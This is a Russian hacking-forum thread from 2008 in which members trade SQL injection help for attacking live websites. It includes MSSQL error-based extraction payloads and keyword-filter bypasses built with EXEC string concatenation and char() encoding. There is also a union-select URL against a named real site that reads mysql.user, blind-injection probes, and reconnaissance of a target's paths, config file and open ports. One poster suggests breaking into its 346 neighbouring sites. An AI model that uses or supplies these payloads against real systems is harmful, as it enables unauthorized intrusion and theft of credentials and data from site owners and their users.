Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Octave_Parango

    Joined:
    6 Nov 2008
    Messages:
    83
    Likes Received:
    11
    Reputations:
    -1

    Да, везде пусто. Обидно.
    Еще как-нибудь можно подлезь? Есть варианты?
     
  2. Parti

    Parti New Member

    Joined:
    7 Oct 2007
    Messages:
    4
    Likes Received:
    1
    Reputations:
    0
    Добрый день

    Подскажите пожалуйста как вывести в ошибке MSSQL данные типа "int"

    1+or+1=(SELECT intColumn ...) не вызывает ошибки в случае если column имеет тип int, только при varchar.

    Спасибо.
     
    #3802 Parti, 25 Nov 2008
    Last edited: 25 Nov 2008
  3. DimOnOID

    DimOnOID Banned

    Joined:
    5 Dec 2006
    Messages:
    407
    Likes Received:
    126
    Reputations:
    4
    а порутать с помощью сплоента?!
     
  4. Octave_Parango

    Joined:
    6 Nov 2008
    Messages:
    83
    Likes Received:
    11
    Reputations:
    -1
    Какой посоветуешь?
     
  5. chekist

    chekist Elder - Старейшина

    Joined:
    14 Nov 2007
    Messages:
    215
    Likes Received:
    160
    Reputations:
    100
    введи uname -a, напиши на форуме что выдаст
     
  6. SHS

    SHS Elder - Старейшина

    Joined:
    4 Aug 2008
    Messages:
    53
    Likes Received:
    2
    Reputations:
    1
    Вопрос:
    Короче есть бажный параметр mssql-inj.
    .asp?id=.....
    Запросы типа -1+or+1=(@@version), db_name() и тд проходят на ура.
    Скрипт фильтрует операторы (select, update, и тд..).
    Какие методы обхода фильтраций существуют? В mysql много знаю, а вот s mssql впервые столкнулся.
     
  7. DimOnOID

    DimOnOID Banned

    Joined:
    5 Dec 2006
    Messages:
    407
    Likes Received:
    126
    Reputations:
    4
    ссылку в пм или сюда
     
  8. [Raz0r]

    [Raz0r] Elder - Старейшина

    Joined:
    25 Feb 2007
    Messages:
    425
    Likes Received:
    484
    Reputations:
    295
    1 or 1=(SELECT cast(name as nvarchar(4000)) FROM table)--
    1 or 1=(SELECT convert(nvarchar,name) FROM table)--
     
  9. [Raz0r]

    [Raz0r] Elder - Старейшина

    Joined:
    25 Feb 2007
    Messages:
    425
    Likes Received:
    484
    Reputations:
    295
    ';EXEC('SEL'+'ECT US'+'ER')--
     
  10. Parti

    Parti New Member

    Joined:
    7 Oct 2007
    Messages:
    4
    Likes Received:
    1
    Reputations:
    0
    Оба эти запроса не выдали ошибку :S.

    Используется mssql в связке с ASP.Net.

    Microsoft SQL Server 2000 - 8.00.2187 (Intel X86) Mar 9 2006 11:38:51 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.0 (Build 2195: Service Pack 4)
     
  11. [Raz0r]

    [Raz0r] Elder - Старейшина

    Joined:
    25 Feb 2007
    Messages:
    425
    Likes Received:
    484
    Reputations:
    295
    попробуй так
    1 or 1=(select convert(int,substring(convert(varchar,name)+char(58),1,999)) from table)--
     
    1 person likes this.
  12. AHMED HASSAN

    AHMED HASSAN New Member

    Joined:
    25 Apr 2007
    Messages:
    16
    Likes Received:
    1
    Reputations:
    0
    hi

    sorry need to write in english

    http://www.fcmetz.com/voir.php?id=-5036%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13%20from%20mysql.user

    i got all that and when user

    http://www.fcmetz.com/voir.php?id=-5036%20union%20select%201,2,3,4,user,6,7,8,9,10,11,12,13%20from%20mysql.user

    doesnt appear

    how to move on

    thanx
     
    1 person likes this.
  13. SHS

    SHS Elder - Старейшина

    Joined:
    4 Aug 2008
    Messages:
    53
    Likes Received:
    2
    Reputations:
    1
    Exec тоже под фильтром.
    Я попробовал сделать так :
    page.asp?id=-1+or+1=(char(0x73)%2bchar(0x65)%2bchar(0x6c)%2bchar(0x65)%2bchar(0x63)%2bchar(0x74)%2bchar(0x7e)%2b+user)--sp_password

    Получил:

    [Microsoft][ODBC SQL Server Driver][SQL Server]Conversion failed when converting the nvarchar value 'select~dbo' to data type int.

    Если же попробовать к примеру top 1 table_name from .... , то тут уже нестыковка синтаксиса.
     
  14. Imperou$

    Imperou$ Elder - Старейшина

    Joined:
    23 May 2008
    Messages:
    90
    Likes Received:
    42
    Reputations:
    0
    Салют народ =)
    Прошу помощи.
    Подобрал поля через order by (скуля),при попытке вывести поля через union select выводит страницу 403 Forbidden
    Поля подобрал верно стопудофф.
    Ввожу
    /page/about_tema.php?id=16+union+select+1,2,3,4,5,6--
    и ппц. :(
    Что это может быть и как бороться?
     
    #3814 Imperou$, 26 Nov 2008
    Last edited: 26 Nov 2008
    1 person likes this.
  15. -=lebed=-

    -=lebed=- хэшкрякер

    Joined:
    21 Jun 2006
    Messages:
    3,804
    Likes Received:
    1,960
    Reputations:
    594
    Вы не имеете прав доступа к /page/about_tema.php. 403 - Запрещено!
     
  16. Imperou$

    Imperou$ Elder - Старейшина

    Joined:
    23 May 2008
    Messages:
    90
    Likes Received:
    42
    Reputations:
    0
    Я понимаю, что запрещено. Я спарашиваю почему, и как это обойти.
    Ведь я могу обращаться к скрипту просто, и при подборе ордер бай тоже могу, всё выводит как надо, но при юнион селект вот такая фигня.
     
  17. Calcutta

    Calcutta Elder - Старейшина

    Joined:
    6 Aug 2007
    Messages:
    343
    Likes Received:
    243
    Reputations:
    36
    читай личку. возможно поможет (-
     
    1 person likes this.
  18. Imperou$

    Imperou$ Elder - Старейшина

    Joined:
    23 May 2008
    Messages:
    90
    Likes Received:
    42
    Reputations:
    0
    Спасибо. Помогло, практически. Но суть понял )
    +
     
  19. _Pantera_

    _Pantera_ Характерне козацтво

    Joined:
    6 Oct 2006
    Messages:
    186
    Likes Received:
    356
    Reputations:
    109
    Там фильтры стоят на комбинации union select и прочее. Надо вот так:
    Code:
    http://www.site.com/pages/blog_historial.php?MUESBLOG=BLOG&VALOTEMA=107+AND+ascii(lower(substring(version(),1,1)))=53
    стоит 5 версия мускула, можно при желании все вытянуть...
    Code:
    /home/site/public_html/ 
    путь от корня к WWW
    Можно просматривать содержимое каталога:
    Code:
    http://www.site.com/admin/includes/
    Вот сдесь по всей видимости конфигурационные данные
    Code:
    http://www.site.com/admin/includes/configuracion.php
    
    Система - линукс
    Открытые порты: 21, 25, 26, 53, 80, 110, 143, 443, 465, 993, 995, 3306
    Думаю самый вариант в твоем случае ломать соседние сайты, а их 346 =)

    PS адресс сайта убрал по просьбе Imperou$
     
    #3819 _Pantera_, 26 Nov 2008
    Last edited: 26 Nov 2008
    3 people like this.
  20. Imperou$

    Imperou$ Elder - Старейшина

    Joined:
    23 May 2008
    Messages:
    90
    Likes Received:
    42
    Reputations:
    0
    Всем спасибо.
    _Pantera_ в частности. Разобрался. Вопрос решён.
     
Thread Status:
Not open for further replies.